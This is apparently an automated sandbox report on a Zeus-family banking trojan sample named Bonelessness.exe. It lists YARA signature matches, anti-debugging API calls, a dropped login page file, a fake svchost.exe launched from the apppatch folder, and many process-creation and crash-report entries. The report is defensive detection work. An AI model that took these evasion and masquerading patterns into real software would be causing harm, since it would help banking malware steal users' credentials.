      Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6260, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6216, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 3496, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7140, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7040, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7024, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7008, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6988, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6944, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6920, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6896, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6876, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@117/43@2385/28
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00401000 IsDebuggerPresent,FindWindowA,memset,CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,StrStrIA,Process32Next,GetHandleInformation,FindCloseChangeNotification,PathFileExistsA,0_2_00401000
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00402660 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402660
      Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[1].htmJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7984:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:2060:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7976:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7672:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7780:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5600:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3912:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7576:64:WilError_03
      Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\A1633C6Ba
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6064:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7772:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3808:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7092:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7684:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8100:64:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6216
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3468:64:WilError_03
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Users\user\AppData\Local\Temp\5FC5.tmpJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Bonelessness.exeReversingLabs: Detection: 95%
      Source: Bonelessness.exeString found in binary or memory: -help
      Source: svchost.exeString found in binary or memory: -help
      Source: C:\Users\user\Desktop\Bonelessness.exeFile read: C:\Users\user\Desktop\Bonelessness.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Bonelessness.exe "C:\Users\user\Desktop\Bonelessness.exe"
      Source: C:\Users\user\Desktop\Bonelessness.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896
      Source: C:\Users\user\Desktop\Bonelessness.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088Jump to behavior
